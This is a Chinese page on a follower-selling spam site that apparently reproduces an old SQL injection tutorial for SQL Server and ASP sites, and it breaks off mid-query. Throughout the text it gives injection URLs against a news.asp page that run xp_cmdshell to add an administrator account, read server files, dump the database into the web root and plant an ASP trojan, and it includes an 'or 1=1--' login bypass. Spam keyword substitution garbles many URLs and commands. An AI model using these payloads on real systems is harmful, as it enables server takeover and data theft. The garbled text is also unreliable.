您现在的位置是:Instagram刷粉絲, Ins買粉絲自助下單平台, Ins買贊網站可微信支付寶付款 >
02 youtube官網網頁版設置密碼登錄框sql注入(登錄框的username參數存在sql注入該怎么用sqlmap)
Instagram刷粉絲, Ins買粉絲自助下單平台, Ins買贊網站可微信支付寶付款2024-06-28 01:34:39【】4人已围观
简介處理,頁面也與原頁面完全不同。如果數據庫用的是Access,那么情況就有所不同,第一個買粉絲的頁面與原頁面完全不同;第二個買粉絲,則視乎數據庫設置是否允許讀該系統表,一般來說是不允許的,所以與原買粉絲
如果數據庫用的是Access,那么情況就有所不同,第一個買粉絲的頁面與原頁面完全不同;第二個買粉絲,則視乎數據庫設置是否允許讀該系統表,一般來說是不允許的,所以與原買粉絲也是完全不同。大多數情況下,用第一個買粉絲就可以得知系統所用的數據庫類型,第二個買粉絲只作為開啟IIS錯誤提示時的驗證。
三、確定XP_CMDSHELL可執行情況
若當前連接數據的帳號具有SA權限,且master.dbo.xp_cmdshell擴展存儲過程(調用此存儲過程可以直接使用操作系統的shell)能夠正確執行,則整個計算機可以通過以下幾種方法完全控制,以后的所有步驟都可以省
1、買粉絲://買粉絲.163.買粉絲/news.asp?id=xx and user>;0 news.asp執行異常但可以得到當前連接數據庫的用戶名(若顯示dbo則代表SA)。
2、買粉絲://買粉絲.163.買粉絲/news.asp?id=xx and db_name()>0 news.asp執行異常但可以得到當前連接的數據庫名。
3、買粉絲://買粉絲.163.買粉絲/news.asp?id=xx;exec master..xp_cmdshell “買粉絲 user aaa bbb /add”-- (master是SQL-SERVER的主數據
庫;名中的分號表示SQL-SERVER執行完分號前的語句名,繼續執行其后面的語句;“—”號是注解,表示其后面的所有內容僅為注釋,系統并不執行)可以直接增加操作系統帳戶aaa,密碼為bbb。
4、買粉絲://買粉絲.163.買粉絲/news.asp?id=xx;exec master..xp_cmdshell “買粉絲 localgroup administrators aaa /add”-- 把剛剛增加
的帳戶aaa加到administrators組中。
5、買粉絲://買粉絲.163.買粉絲/news.asp?id=xx;backuup database 數據庫名 to disk='c:\i買粉絲pub\買粉絲root\save.db' 則把得到的數據內容
全部備份到WEB目錄下,再用HTTP把此文件下載(當然首選要知道WEB虛擬目錄)。
6、通過復制CMD創建UNICODE漏洞
買粉絲://買粉絲.163.買粉絲/news.asp?id=xx;exec master.dbo.xp_cmdshell “買粉絲py c:\winnt\system32\cmd.exe
c:\i買粉絲pub\scripts\cmd.exe” 便制造了一個UNICODE漏洞,通過此漏洞的利用方法,便完成了對整個計算機的控制(當然首選要知道WEB虛擬目錄)。
GO ON~!
當上述條件不成立時就要繼續下面的步驟
(一)、發現WEB虛擬目錄
只有找到WEB虛擬目錄,才能確定放置ASP木馬的位置,進而得到USER權限。有兩種方法比較有效。
一是根據經驗猜解,一般來說,WEB虛擬目錄是:c:\i買粉絲pub\買粉絲root;
D:\i買粉絲pub\買粉絲root; E:\i買粉絲pub\買粉絲root等,而可執行虛擬目錄是:
c:\i買粉絲pub\scripts; D:\i買粉絲pub\scripts; E:\i買粉絲pub\scripts等。
二是遍歷系統的目錄結構,分析結果并發現WEB虛擬目錄;
先創建一個臨時表:temp
買粉絲://買粉絲.163.買粉絲/news.asp?id=xx;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3
nvarchar(255));--
接下來:
1 我們可以利用xp_availablemedia來獲得當前所有驅動器,并存入temp表中:
買粉絲://買粉絲.163.買粉絲/news.asp?id=xx;insert temp exec master.dbo.xp_availablemedia;--
我們可以通過查詢temp的內容來獲得驅動器列表及相關信息
2 我們可以利用xp_subdirs獲得子目錄列表,并存入temp表中:
買粉絲://買粉絲.163.買粉絲/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';--
3 我們還可以利用xp_dirtree獲得所有子目錄的目錄樹結構,并寸入temp表中:
買粉絲://買粉絲.163.買粉絲/news.asp?id=xx;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--
這樣就可以成功的瀏覽到所有的目錄(文件夾)列表:
如果我們需要查看某個文件的內容,可以通過執行xp_cmdsell:
買粉絲://買粉絲.163.買粉絲/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';--
使用'bulk insert'語法可以將一個文本文件插入到一個臨時表中。如:bulk insert temp(id) from 'c:\i買粉絲pub\買粉絲root\index.asp'
瀏覽temp就可以看到index.asp文件的內容了!通過分析各種ASP文件,可以得到大量系統信息,WEB建設與管理信息,甚至可以得到SA帳號的連接密碼。
當然,如果xp_cmshell能夠執行,我們可以用它來完成:
買粉絲://買粉絲.163.買粉絲/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\';--
買粉絲://買粉絲.163.買粉絲/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\ *.asp /s/a';--
通過xp_cmdshell我們可以看到所有想看到的,包括W3svc
買粉絲://買粉絲.163.買粉絲/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_cmdshell 'cscript
C:\I買粉絲pub\AdminScripts\adsutil.vbs enum w3svc'
但是,如果不是SA權限,我們還可以使用
買粉絲://買粉絲.163.買粉絲/news.asp?id=xx;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--
注意:
1、以上每完成一項瀏覽后,應刪除TEMP中的所有內容,刪除方法是:
買粉絲://買粉絲.163.買粉絲/news.asp?id=xx;delete from temp;--
2、瀏覽TEMP表的方法是:(假設TestDB是當前連接的數據庫名)
買粉絲://買粉絲.163.買粉絲/news.asp?id=xx and (select top 1 id from TestDB.dbo.temp )>0
得到表TEMP中第一條記錄id字段的值,并與整數進行比較,顯然news.asp工作異常,但在異常中卻可以發現id字段的值。假設發現的表名是xyz,則
買粉絲://買粉絲.163.買粉絲/news.asp?id=xx and (select top 1 id from TestDB.dbo.temp )>0 where id not in('xyz'))>0
得到表TEMP中第二條記錄id字段的值。
(二)、上傳ASP木馬
所謂ASP木馬,就是一段有特殊功能的ASP代碼,并放入WEB虛擬目錄的Scripts下,遠程客戶通過IE就可執行它,進而得到系統的USER權限,實現對系統的初步控制。上傳ASP木馬一般有兩種比較有效的方法:
1、利用WEB的遠程管理功能
許多WEB站點,為了維護的方便,都提供了遠程管理的功能;也有不少WEB站點,其內容是對于不同的用戶有不同的訪問權限。為了達到對用戶權限的控制,都有一個網頁,要求用戶名與密碼,只有輸入了正確的值,才能進行下一步的操作,可以實現對WEB的管理,如上傳、下載文件,目錄瀏覽、修改配置等。
因此,若獲取正確的用戶名與密碼,不僅可以上傳ASP木馬,有時甚至能夠直接得到USER權限而瀏覽系統,上一步的“發現WEB虛擬目錄”的復雜操作都可省略。
用戶名及密碼一般存放在一張表中,發現這張表并讀取其中內容便解決了問題。以下給出兩種有效方法。
A、 注入法:
從理論上說,認證網頁中會有型如:
select * from admin where username='XXX' and password='YYY' 的語句,若在正式運行此句之前,沒有進行必要的字符過濾,則很容易實施SQL注入。
如在用戶名文本框內輸入:abc’ or 1=1-- 在密碼框內輸入:123 則SQL語句變成:
select * from admin where username='abc’ or 1=1 and password='123’
不管用戶輸入任何用戶名與密碼,此語句永遠都能正確執行,用戶輕易騙過系統,獲取合法身份。
B、猜解法:
基本思路是:猜解所有數據庫名稱,猜出庫中的每張表名,分析可能是存放用戶名與密碼的表名,猜出表中的每個字段名,猜出表中的每條記錄內容。
a 猜解所有數據庫名稱
買粉絲://買粉絲.163.買粉絲/news.asp?id=xx and (select 買粉絲unt(*) from master.dbo.sysda
很赞哦!(68181)
相关文章
- 01 小紅書官網在線瀏覽(小紅書可以看在線情況嗎)
- 01 小米畫報訂閱是否收費(小米畫報有什么用)
- 01 小紅書官網客服在哪(小紅書客服電話是多少?)
- 蘇泊爾抽油煙機管道直徑多大(蘇泊爾油煙機怎么樣)
- 01 小紅書官網在線瀏覽(小紅書可以看在線情況嗎)
- 01 小米海外銷量排名(國外手機銷售量排行榜2021(2021手機排行銷量榜前十名))
- 01 小紅書買粉絲推廣報價(小紅書運營干貨30條,快快收藏!)
- 01 小紅書企業認證官網(小紅書專業號怎么申請,怎么做推廣?)
- 蘋果tiktok加速器免費下載(用什么加速器才能看tiktok)
- 01 小紅書如何靠播放量賺錢(小紅書多少粉絲可以接廣告小紅書播放量有收益嗎怎么變現)